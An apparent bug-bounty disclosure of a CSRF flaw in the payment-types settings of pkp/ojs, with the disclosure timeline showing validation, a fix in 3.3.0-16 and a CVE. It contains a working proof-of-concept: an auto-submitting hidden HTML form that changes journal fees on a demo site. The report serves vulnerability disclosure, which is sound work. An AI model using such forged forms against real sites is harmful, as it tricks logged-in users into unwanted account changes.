CSRF in Payment Types in pkp/ojs

Valid

Reported on

Oct 8th 2023

Description

CSRF in Payment Types

Proof of Concept

1 .Attacker send form fake to user

  <html>
     <body>
           <form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/payments/savePaymentTypes">
           <input type="hidden" name="csrfToken" value="" />
           <input type="hidden" name="publicationFee" value="3" />
           <input type="hidden" name="purchaseIssueFee" value="3" />
           <input type="hidden" name="purchaseArticleFee" value="3" />
           <input type="hidden" name="restrictOnlyPdf" value="3" />
           <input type="hidden" name="membershipFee" value="3" />
           <input type="hidden" name="submitFormButton" value="1" />
          <input type="submit" value="Submit request" />
          </form>
          <script>
           history.pushState('', '', '/');
           document.forms[0].submit();
         </script>
      </body>
    </html>

2 .User click , edited unwanted payment types

Video Poc

https://drive.google.com/file/d/1jI4bW5BJXGdJ7kICI-K1Kmg5y2EPw7f0/view?usp=sharing

Payload Poc

https://drive.google.com/file/d/16fzxnTrHB4_IdGC1nqot2ovlp4elqq7H/view?usp=sharing

Impact

Traps users from performing unwanted actions

We are processing your report and will contact the pkp/ojs team within 24 hours. 2 months ago
HaiNguyen modified the report
2 months ago
We have contacted a member of the pkp/ojs team and are waiting to hear back 2 months ago
HaiNguyen
2 months ago

Researcher

Hi, any new update ?

HaiNguyen
2 months ago

Researcher

Sorry,I cannot report the same vulnerability more than once. The system doesn't allow that. This leaves me with an approximate choice of vulnerability. I also couldn't find the correct Occurrences link. Hope you understand. Thank.

Alec Smecher modified the Severity from Medium (6.3) to Low (3.5) 2 months ago
Alec Smecher
2 months ago

@admin, this has been filed in the wrong repository; it should be in pkp/ojs rather than pkp/pkp-lib. Can you change the repo? (9407)

Ben Harvie
a month ago

Admin

The repository has been updated as requested.

Alec Smecher modified the CWE from Missing Authorization to Cross-Site Request Forgery (CSRF) a month ago
The researcher has received a minor penalty to their credibility for misclassifying the vulnerability type: -1
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Alec Smecher validated this vulnerability a month ago
HaiNguyen has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Alec Smecher marked this as fixed in 3.3.0-16 with commit 99a9f3 a month ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Alec Smecher published this vulnerability a month ago
to join this conversation